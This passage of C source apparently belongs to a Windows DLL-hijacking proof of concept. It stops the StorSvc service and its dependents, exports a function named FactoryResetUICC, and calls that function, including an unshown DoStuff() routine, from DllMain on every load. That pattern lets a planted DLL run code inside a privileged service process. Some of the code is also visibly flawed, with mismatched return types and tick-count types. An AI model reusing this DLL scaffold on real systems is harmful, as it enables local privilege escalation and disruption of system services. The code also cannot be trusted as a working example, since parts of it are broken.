SERVICE_STOP |
SERVICE_QUERY_STATUS |
SERVICE_ENUMERATE_DEPENDENTS);
if (schService == NULL)
{
CloseServiceHandle(schSCManager);
return;
}
// Make sure the service is not already stopped.
if (!QueryServiceStatusEx(
schService,
SC_STATUS_PROCESS_INFO,
(LPBYTE)&ssp,
sizeof(SERVICE_STATUS_PROCESS),
&dwBytesNeeded))
{
goto stop_cleanup;
}
if (ssp.dwCurrentState == SERVICE_STOPPED)
{
goto stop_cleanup;
}
// If a stop is pending, wait for it.
while (ssp.dwCurrentState == SERVICE_STOP_PENDING)
{
// Do not wait longer than the wait hint. A good interval is
// one-tenth of the wait hint but not less than 1 second
// and not more than 10 seconds.
dwWaitTime = ssp.dwWaitHint / 10;
if (dwWaitTime < 1000)
dwWaitTime = 1000;
else if (dwWaitTime > 10000)
dwWaitTime = 10000;
Sleep(dwWaitTime);
if (!QueryServiceStatusEx(
schService,
SC_STATUS_PROCESS_INFO,
(LPBYTE)&ssp,
sizeof(SERVICE_STATUS_PROCESS),
&dwBytesNeeded))
{
goto stop_cleanup;
}
if (ssp.dwCurrentState == SERVICE_STOPPED)
{
goto stop_cleanup;
}
if (GetTickCount() - dwStartTime > dwTimeout)
{
goto stop_cleanup;
}
}
// If the service is running, dependencies must be stopped first.
StopDependentServices();
// Send a stop code to the service.
if (!ControlService(
schService,
SERVICE_CONTROL_STOP,
(LPSERVICE_STATUS)&ssp))
{
goto stop_cleanup;
}
// Wait for the service to stop
while (ssp.dwCurrentState != SERVICE_STOPPED)
{
Sleep(ssp.dwWaitHint);
if (!QueryServiceStatusEx(
schService,
SC_STATUS_PROCESS_INFO,
(LPBYTE)&ssp,
sizeof(SERVICE_STATUS_PROCESS),
&dwBytesNeeded))
{
goto stop_cleanup;
}
if (ssp.dwCurrentState == SERVICE_STOPPED)
break;
if (GetTickCount64() - dwStartTime > dwTimeout)
{
goto stop_cleanup;
}
}
stop_cleanup:
CloseServiceHandle(schService);
CloseServiceHandle(schSCManager);
}
BOOL __stdcall StopDependentServices()
{
DWORD i;
DWORD dwBytesNeeded;
DWORD dwCount;
LPENUM_SERVICE_STATUS lpDependencies = NULL;
ENUM_SERVICE_STATUS ess;
SC_HANDLE hDepService;
SERVICE_STATUS_PROCESS ssp;
SC_HANDLE schSCManager, schService;
LPCTSTR szSvcName = L"StorSvc";
DWORD dwStartTime = GetTickCount64();
DWORD dwTimeout = 30000; // 30-second time-out
schSCManager = OpenSCManager(
NULL, // local computer
NULL, // ServicesActive database
SC_MANAGER_ALL_ACCESS); // full access rights
if (NULL == schSCManager)
{
return;
}
// Get a handle to the service.
schService = OpenService(
schSCManager, // SCM database
szSvcName, // name of service
SERVICE_STOP |
SERVICE_QUERY_STATUS |
SERVICE_ENUMERATE_DEPENDENTS);
if (schService == NULL)
{
CloseServiceHandle(schSCManager);
return;
}
// Pass a zero-length buffer to get the required buffer size.
if (EnumDependentServices(schService, SERVICE_ACTIVE,
lpDependencies, 0, &dwBytesNeeded, &dwCount))
{
// If the Enum call succeeds, then there are no dependent
// services, so do nothing.
return TRUE;
}
else
{
if (GetLastError() != ERROR_MORE_DATA)
return FALSE; // Unexpected error
// Allocate a buffer for the dependencies.
lpDependencies = (LPENUM_SERVICE_STATUS)HeapAlloc(
GetProcessHeap(), HEAP_ZERO_MEMORY, dwBytesNeeded);
if (!lpDependencies)
return FALSE;
__try {
// Enumerate the dependencies.
if (!EnumDependentServices(schService, SERVICE_ACTIVE,
lpDependencies, dwBytesNeeded, &dwBytesNeeded,
&dwCount))
return FALSE;
for (i = 0; i < dwCount; i++)
{
ess = *(lpDependencies + i);
// Open the service.
hDepService = OpenService(schSCManager,
ess.lpServiceName,
SERVICE_STOP | SERVICE_QUERY_STATUS);
if (!hDepService)
return FALSE;
__try {
// Send a stop code.
if (!ControlService(hDepService,
SERVICE_CONTROL_STOP,
(LPSERVICE_STATUS)&ssp))
return FALSE;
// Wait for the service to stop.
while (ssp.dwCurrentState != SERVICE_STOPPED)
{
Sleep(ssp.dwWaitHint);
if (!QueryServiceStatusEx(
hDepService,
SC_STATUS_PROCESS_INFO,
(LPBYTE)&ssp,
sizeof(SERVICE_STATUS_PROCESS),
&dwBytesNeeded))
return FALSE;
if (ssp.dwCurrentState == SERVICE_STOPPED)
break;
if (GetTickCount64() - dwStartTime > dwTimeout)
return FALSE;
}
}
__finally
{
// Always release the service handle.
CloseServiceHandle(hDepService);
}
}
}
__finally
{
// Always free the enumeration buffer.
HeapFree(GetProcessHeap(), 0, lpDependencies);
}
}
return TRUE;
}
int DllExport FactoryResetUICC()
{
DoStuff();
DoStopSvc();
return 0;
}
DllExport BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
FactoryResetUICC();
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}